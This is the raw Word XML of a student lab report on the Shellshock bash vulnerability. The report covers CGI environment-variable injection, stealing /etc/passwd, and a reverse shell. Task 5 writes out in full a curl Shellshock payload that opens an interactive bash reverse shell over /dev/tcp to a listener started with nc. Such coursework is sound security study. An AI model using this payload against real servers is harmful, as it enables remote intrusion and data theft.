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8113C3" w14:textId="37CA2973" w:rsidR="00FC1513" w:rsidRDefault="00CC0F80" w:rsidP="00CC0F80">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Lab 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4F1EC" w14:textId="4317913E" w:rsidR="00CC0F80" w:rsidRDefault="00CC0F80" w:rsidP="00CC0F80">
      <w:r>
        <w:t>Task 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BDCAC" w14:textId="2DCE624E" w:rsidR="00CC0F80" w:rsidRDefault="00C638B1" w:rsidP="00CC0F80">
      <w:r>
        <w:t>Test to see if bash_shellshock is vulnerable to shellshock attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E2479" w14:textId="2218577D" w:rsidR="00C638B1" w:rsidRDefault="00C638B1" w:rsidP="00CC0F80">
      <w:r>
        <w:tab/>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE10DDC" w14:textId="59FEF890" w:rsidR="00C638B1" w:rsidRDefault="00C638B1" w:rsidP="00C55699">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C638B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37081C0A" wp14:editId="518B6222">
            <wp:extent cx="5943600" cy="779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779145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C37A9" w14:textId="3AC7F711" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>If bash_shellshock was not vulnerable then it would not have echoed vulnerable, but it did therefore it is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25929AFC" w14:textId="18B9BB89" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699">
      <w:r>
        <w:t>Test to see if bash is vulnerable to shellshock attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F8A25" w14:textId="44F847C3" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699">
      <w:r>
        <w:tab/>
        <w:t>Commands used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5D1EB" w14:textId="3957CC3C" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C55699">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E29CB3E" wp14:editId="4466C8B0">
            <wp:extent cx="5894581" cy="7315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94581" cy="731583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842D942" w14:textId="76AFC6D2" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Unlike bash_shellshock, bash did not echo vulnerable which shows that it is not vulnerable to shellshock attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B4B84" w14:textId="687D8167" w:rsidR="008771CA" w:rsidRDefault="008771CA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA43B4" w14:textId="77777777" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="00C55699"/>
    <w:p w14:paraId="1FD3030A" w14:textId="586C4236" w:rsidR="00C55699" w:rsidRDefault="00C55699" w:rsidP="008771CA">
      <w:r>
        <w:t>Task 2:</w:t>
      </w:r>
      <w:r w:rsidR="008771CA">
        <w:t xml:space="preserve"> After writing the code we were supposed to make sure the file was in the /usr/lib/cgi-bin folder, but it kept giving me permission denied because I did not have root permissions so I used the first command to bypass that. After that I used the second command to run the attack and it prints out to the terminal what it should.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F1C59" w14:textId="110F9261" w:rsidR="00C55699" w:rsidRDefault="008771CA" w:rsidP="00C55699">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Code Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB41C61" w14:textId="63F61B34" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="00C55699">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008771CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9F8014" wp14:editId="6B017B1F">
            <wp:extent cx="2419560" cy="1036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19560" cy="1036410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CC988" w14:textId="2770A2A7" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="00C55699">
      <w:r>
        <w:tab/>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C9CFD" w14:textId="45023AB6" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="00C55699">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Used for moving file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C77F1" w14:textId="019323A6" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="008771CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008771CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01C36568" wp14:editId="4015F16B">
            <wp:extent cx="4686706" cy="255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6706" cy="255292"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB4E62" w14:textId="369A6AC4" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="008771CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Used for launching attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5409D83F" w14:textId="5CFEA8D5" w:rsidR="00C55699" w:rsidRDefault="008771CA" w:rsidP="008771CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008771CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7748AC7A" wp14:editId="3A0DB9BC">
            <wp:extent cx="5296359" cy="8268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6359" cy="826842"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8598B" w14:textId="2DC00104" w:rsidR="008771CA" w:rsidRDefault="008771CA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3BB63" w14:textId="7F845255" w:rsidR="008771CA" w:rsidRDefault="008771CA" w:rsidP="008771CA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 3: </w:t>
      </w:r>
      <w:r w:rsidR="00C31588">
        <w:t>Passing data to Bash via Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48021EEB" w14:textId="0939D66D" w:rsidR="00C31588" w:rsidRDefault="00C31588" w:rsidP="008771CA">
      <w:r>
        <w:tab/>
        <w:t>Code Used: This code uses the last line to print out all the environment variables of the process. $$ is replaced by bash with the id of the current process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A0FDE" w14:textId="096F8DA1" w:rsidR="00C31588" w:rsidRDefault="00C31588" w:rsidP="008771CA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C31588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17990BB1" wp14:editId="65625399">
            <wp:extent cx="2571973" cy="9335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1973" cy="933531"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBD435" w14:textId="0436756C" w:rsidR="00C31588" w:rsidRDefault="00C31588" w:rsidP="00C31588">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Commands Used: we call curl to call a request from the CGI file and obtain its response. If we want to pass our own information to the environment variables then we simply use the command used in the second picture. We can change the User-Agent to what we want, in this case we change it from curl/7.47.0 to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE0AF3" w14:textId="2B973EC0" w:rsidR="009B02CF" w:rsidRDefault="00C31588" w:rsidP="00C31588">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19474D1F" wp14:editId="19E3CCE8">
            <wp:extent cx="3089432" cy="3227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5540" cy="3233450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6137CD" w14:textId="480B2F5C" w:rsidR="00C31588" w:rsidRDefault="00C31588" w:rsidP="00C31588">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14FFDEAB" wp14:editId="17EF344A">
            <wp:extent cx="4018881" cy="192786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4554" cy="1944973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024A985" w14:textId="38004188" w:rsidR="00C31588" w:rsidRDefault="00C31588" w:rsidP="00C31588">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Launching Shellshock Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDECFC6" w14:textId="2E0B634F" w:rsidR="00552FA0" w:rsidRDefault="00552FA0" w:rsidP="00C31588">
      <w:r>
        <w:tab/>
        <w:t>Command Used w/ Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED9A94" w14:textId="4669D873" w:rsidR="00552FA0" w:rsidRDefault="00552FA0" w:rsidP="00C31588">
      <w:r>
        <w:tab/>
        <w:t>Here we use the command to steal the contents of the server’s /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422B021" w14:textId="65A17E08" w:rsidR="00C31588" w:rsidRDefault="00552FA0" w:rsidP="00552FA0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00552FA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AF8971" wp14:editId="4E5F45A9">
            <wp:extent cx="5943600" cy="30981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8165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CD2F7" w14:textId="23A9473E" w:rsidR="00552FA0" w:rsidRDefault="00552FA0" w:rsidP="00552FA0">
      <w:r>
        <w:t>It is not possible to steal the content of shadow file because /etc/shadow file requires root privileges and the Apache server runs on a user account, not root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301ED883" w14:textId="2A64DBE7" w:rsidR="00552FA0" w:rsidRDefault="00552FA0" w:rsidP="00552FA0"/>
    <w:p w14:paraId="7A54FD3D" w14:textId="29840293" w:rsidR="00552FA0" w:rsidRDefault="00552FA0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48638D28" w14:textId="78EF5F19" w:rsidR="00552FA0" w:rsidRDefault="00552FA0" w:rsidP="00552FA0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 5: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12202E5B" w14:textId="1D08DC5B" w:rsidR="008E3837" w:rsidRPr="008E3837" w:rsidRDefault="008E3837" w:rsidP="008E3837">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command Used: The full command is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -A ‘() { echo “hello”;}; echo Content_type:text/plain; echo; </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk66057193"/>
      <w:r w:rsidRPr="008E3837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.0.2.15/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008E3837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>’ http://10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="0000683A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/cgi-bin/myprog.cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>but it was too long to fit into one screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D069FB0" w14:textId="351F4F5C" w:rsidR="008E3837" w:rsidRDefault="008E3837" w:rsidP="008E3837">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008E3837">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F279BE8" wp14:editId="12D5F226">
            <wp:extent cx="5943600" cy="21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6535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34515B" w14:textId="7294C83B" w:rsidR="00542FFD" w:rsidRDefault="00542FFD" w:rsidP="00542FFD">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00542FFD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B91345A" wp14:editId="24344C39">
            <wp:extent cx="5943600" cy="1859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59280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D268DB" w14:textId="7FB5A7CC" w:rsidR="00542FFD" w:rsidRDefault="00542FFD" w:rsidP="00542FFD"/>
    <w:p w14:paraId="76F336B7" w14:textId="40EE431C" w:rsidR="00542FFD" w:rsidRDefault="00542FFD" w:rsidP="00542FFD">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command nc -nlvp 9090 listens to any activity happening to the port 9090. /bin/bash -i signifies that the shell must be interactive otherwise it won’t work. The command </w:t>
      </w:r>
      <w:r w:rsidRPr="00542FFD">
        <w:t>/bin/bash -i &gt; /dev/tcp/10.0.2.15/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> starts a bash shell on the server with the input and output both going to the same TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9152D4" w14:textId="552357B2" w:rsidR="00542FFD" w:rsidRDefault="00542FFD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E828D9" w14:textId="6CCCF989" w:rsidR="00542FFD" w:rsidRDefault="00542FFD" w:rsidP="00542FFD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DE6CC" w14:textId="7860226E" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="00542FFD">
      <w:r>
        <w:tab/>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15BD5D" w14:textId="2F0D75D3" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="00542FFD">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B52A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="326DEB1B" wp14:editId="3DE14147">
            <wp:extent cx="3093988" cy="17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3988" cy="1733700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA8F42" w14:textId="3ECB3295" w:rsidR="00542FFD" w:rsidRDefault="00542FFD" w:rsidP="00542FFD">
      <w:r>
        <w:tab/>
        <w:t>Redo Task 3 with /bin/bash instead of /bin/bash_shellshock</w:t>
      </w:r>
      <w:r w:rsidR="002B52A0">
        <w:t xml:space="preserve"> and record observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14605546" w14:textId="4B2B5327" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="002B52A0">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B52A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB702C5" wp14:editId="43FC2551">
            <wp:extent cx="4888158" cy="483489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0906" cy="4837608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821D230" w14:textId="748647E9" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="002B52A0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>It still worked as before without a problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02EE76" w14:textId="1482F891" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="00542FFD"/>
    <w:p w14:paraId="7F868207" w14:textId="1CF3820D" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="00542FFD">
      <w:r>
        <w:tab/>
        <w:t>Redo Task 5 with /bin/bash instead of /bin/bash_shellshock and record observations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0F9AD" w14:textId="00A29C1E" w:rsidR="002B52A0" w:rsidRDefault="002B52A0" w:rsidP="002B52A0">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B52A0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486BE1C5" wp14:editId="782A0F87">
            <wp:extent cx="5943600" cy="259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90800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BD7ED" w14:textId="4746CC9D" w:rsidR="002B52A0" w:rsidRPr="00CC0F80" w:rsidRDefault="002B52A0" w:rsidP="002B52A0">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>All it did was run the code, it didn’t run the attack because the string starting with () needs to be parsed to a function and you can’t do that in bash.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002B52A0" w:rsidRPr="00CC0F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F80"/>
    <w:rsid w:val="0000683A"/>
    <w:rsid w:val="00216434"/>
    <w:rsid w:val="002B52A0"/>
    <w:rsid w:val="00377C84"/>
    <w:rsid w:val="003E0250"/>
    <w:rsid w:val="00542FFD"/>
    <w:rsid w:val="00552FA0"/>
    <w:rsid w:val="008771CA"/>
    <w:rsid w:val="008A511D"/>
    <w:rsid w:val="008E3837"/>
    <w:rsid w:val="00970BB5"/>
    <w:rsid w:val="009B02CF"/>
    <w:rsid w:val="00C061C5"/>
    <w:rsid w:val="00C31588"/>
    <w:rsid w:val="00C55699"/>
    <w:rsid w:val="00C638B1"/>
    <w:rsid w:val="00CC0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54209"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6862FCAD-5DE6-4E06-B95E-3C9C9A81F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3837"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E38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3043</TotalTime>
  <Pages>7</Pages>
  <Words>394</Words>
  <Characters>2246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Vasquez</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Eric Vasquez</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-01T17:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-08T06:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>